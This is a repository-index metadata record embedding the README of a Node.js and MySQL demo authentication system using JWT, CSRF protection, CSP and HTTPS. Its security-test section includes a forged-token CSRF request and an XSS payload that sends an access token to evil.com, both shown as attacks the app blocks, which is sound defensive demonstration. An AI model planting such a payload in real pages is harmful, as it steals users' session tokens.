{"id":29509798,"url":"https://github.com/nabeelabbaxi/secure-auth-system-nodejs","last_synced_at":"2026-04-07T08:32:26.883Z","repository":{"id":304801148,"uuid":"1019568712","full_name":"nabeelabbaxi/secure-auth-system-nodejs","owner":"nabeelabbaxi","description":"Secure full-stack auth system using Node.js, MySQL, JWT, CSRF, and HTTPS","archived":false,"fork":false,"pushed_at":"2025-07-15T08:23:40.000Z","size":1754,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-08-30T17:47:23.604Z","etag":null,"topics":["authentication","csrf-protection","express","jwt","jwt-authentication","mysql","nodejs","secure-auth","security"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nabeelabbaxi.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-07-14T14:26:36.000Z","updated_at":"2025-07-15T08:24:22.000Z","dependencies_parsed_at":"2025-07-15T20:04:37.841Z","dependency_job_id":"885bb6f5-792d-4d18-afeb-68ad9a6cd700","html_url":"https://github.com/nabeelabbaxi/secure-auth-system-nodejs","commit_stats":null,"previous_names":["nabeelabbaxi/secure-auth-system-nodejs"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/nabeelabbaxi/secure-auth-system-nodejs","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nabeelabbaxi%2Fsecure-auth-system-nodejs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nabeelabbaxi%2Fsecure-auth-system-no
dejs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nabeelabbaxi%2Fsecure-auth-system-nodejs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nabeelabbaxi%2Fsecure-auth-system-nodejs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nabeelabbaxi","download_url":"https://codeload.github.com/nabeelabbaxi/secure-auth-system-nodejs/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nabeelabbaxi%2Fsecure-auth-system-nodejs/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31506562,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-07T03:10:19.677Z","status":"ssl_error","status_checked_at":"2026-04-07T03:10:13.982Z","response_time":105,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["authentication","csrf-protection","express","jwt","jwt-authentication","mysql","nodejs","secure-auth","security"],"created_at":"2025-07-16T07:25:24.509Z","updated_at":"2026-04-07T08:32:26.875Z","avatar_url":"https://github.com/nabeelabbaxi.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Secure Auth System (Node.js + MySQL + JWT + CSRF + HTTPS)\n\nA full-stack secure authentication and CRUD system using:\n\n- Node.js 
(Express)\n- MySQL (via XAMPP)\n- JWT (Access + Refresh Tokens)\n- Double Submit Cookie CSRF Protection\n- HTTPS (via mkcert)\n- Secure HTTP-only Cookies\n- CSP Headers\n- SweetAlert, Bootstrap UI\n- Token Expiry Countdown\n- Full Security Test Guide\n\n---\n\n## Project Structure\n```text\nsecure-auth-system-nodejs/\n│\n├── backend/\n│   ├── .env               # Environment variables (DB + secrets)\n│   ├── server.js          # Express HTTPS server\n│   ├── db.js              # MySQL DB connection\n│   ├── auth.js            # JWT token generators\n│   └── package.json       # Dependencies (express, mysql2, bcrypt, etc.)\n│\n├── certs/\n│   ├── cert.pem           # HTTPS cert (mkcert)\n│   └── key.pem            # HTTPS private key (mkcert)\n│\n├── frontend/\n│   ├── index.html         # UI: login, dashboard, product CRUD\n│   ├── script.js          # Logic: token flow, UI updates\n│   └── secure_auth.sql    # SQL: Create DB, tables, sample data\n```\n\n---\n\n## 1. Prerequisites\n\n- Node.js \u0026 npm installed\n- MySQL (use XAMPP or standalone)\n- mkcert to generate local HTTPS certificates\n- http-server for frontend serving over HTTPS\n\n---\n\n## 2. Setup Backend\n\n### Install Dependencies\n\n```bash\ncd backend/\nnpm install\n```\n\n.env Template\nCreate backend/.env:\n```\nDB_HOST=localhost\nDB_USER=root\nDB_PASSWORD=\nDB_NAME=secure_auth\nACCESS_TOKEN_SECRET=access_secret_example\nREFRESH_TOKEN_SECRET=refresh_secret_example\n```\n\n---\n\n## 3. Setup Database\nOpen XAMPP → Start MySQL\n\nImport SQL file via phpMyAdmin or CLI:\n- Use frontend/secure_auth.sql\n\nThis creates:\n\n- users table (with hashed password)\n- products table (sample products)\n\n---\n\n## Default Credentials\n\n- Username: `admin`\n- Password: `123456`\n\nUse these credentials to log in after initial setup. Change them in the database for production use.\n\n---\n\n## 4. 
Generate HTTPS Certificates\n\n### Install mkcert\nOn Windows (via Chocolatey):\n```\nchoco install mkcert\n```\nOn macOS:\n```\nbrew install mkcert\nbrew install nss  # Firefox support\n```\n\n### Create Certificates\nFrom the project root, run:\n```\nmkdir certs\nmkcert -key-file ./certs/key.pem -cert-file ./certs/cert.pem localhost 127.0.0.1\n```\n\n---\n\n## 5. Start Backend Server (HTTPS)\n```\ncd backend/\nnode server.js\n```\nServer runs at: https://localhost:3007\n\n---\n\n## 6. Open Frontend (HTTPS)\nServe the frontend over HTTPS using http-server:\n```\nnpm install -g http-server\n```\nFrom inside the frontend/ folder:\n```\nhttp-server -S -C ../certs/cert.pem -K ../certs/key.pem -p 5500\n```\nVisit in browser:\nhttps://127.0.0.1:5500/\n\nBoth frontend and backend are now served over HTTPS.\n\n---\n\n## 7. Security Layers Implemented\n\n| Layer               | Description                                                      |\n| ------------------- | ---------------------------------------------------------------- |\n| JWT                 | Access (20s) + Refresh (60s) via HTTP-only cookies               |\n| CSRF                | Double Submit Cookie pattern with custom header (x-csrf-token)   |\n| CSP                 | Content-Security-Policy: blocks inline scripts, external origins |\n| XSS Protection      | CSP + no inline JS + no eval()                                   |\n| SameSite=Strict     | Prevents cross-site cookies from being sent unintentionally      |\n\n---\n\n## 8. Simulate Security Tests\n\n1. Unauthorized Access\n```\ncurl -X GET https://localhost:3007/products\n# Should return 401 (no token)\n```\n\n2. Access Token Expiry\nWait 20s after login\n\nTry a CRUD action\n\nIt will auto-refresh via /refresh and retry the request\n\n3. Refresh Token Expiry\nWait 60s after login\n\nTry any request\n\nSession expires\n\nYou’re logged out automatically\n\n4. 
CSRF Test\nTry running this in browser console (not your app tab):\n```js\nfetch('https://localhost:3007/products', {\n  method: 'POST',\n  credentials: 'include',\n  headers: {\n    'Content-Type': 'application/json',\n    'x-csrf-token': 'fake-token'\n  },\n  body: JSON.stringify({ name: 'MaliciousProduct', price: 0 })\n});\n```\nShould return 403 Forbidden (invalid CSRF token)\n\n5. XSS Simulation\nTry injecting script in product name:\n```html\n\u003cscript\u003efetch('https://evil.com?token=' + localStorage.getItem('access_token'))\u003c/script\u003e\n```\nWill not work:\n\n- No localStorage tokens\n- CSP blocks inline JS\n\n---\n\n## 9. Features\n\n- Secure login with hashed passwords (bcrypt)\n- Fully HTTPS secured with trusted certs\n- Auto token refresh logic with countdown timers\n- SweetAlert feedback for users\n- CSP headers to prevent inline/injected scripts\n- Ready-to-use with minimum setup\n\n---\n\n## 10. Testing Tips\n\n- Use Chrome/Firefox in incognito mode\n- Watch browser DevTools → Application → Cookies\n- Use console.log to trace token and CSRF logic\n- Try simulating attacker behavior in separate tabs or domains\n\n---\n\n## 11. Possible Enhancements\n\n- Server-side CSRF token storage (more secure)\n- Token revocation (blacklist DB)\n- Role-based authorization\n- User registration UI\n- Rate limiting\n\n---\n\n## License\nMIT License – Free to use, modify, and share.\n\n---\n\n## Author\nBuilt by Nabeel Abbasi with a focus on API security and beginner-friendly demos.\nStar the repo if you found it useful.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnabeelabbaxi%2Fsecure-auth-system-nodejs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnabeelabbaxi%2Fsecure-auth-system-nodejs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnabeelabbaxi%2Fsecure-auth-system-nodejs/lists"}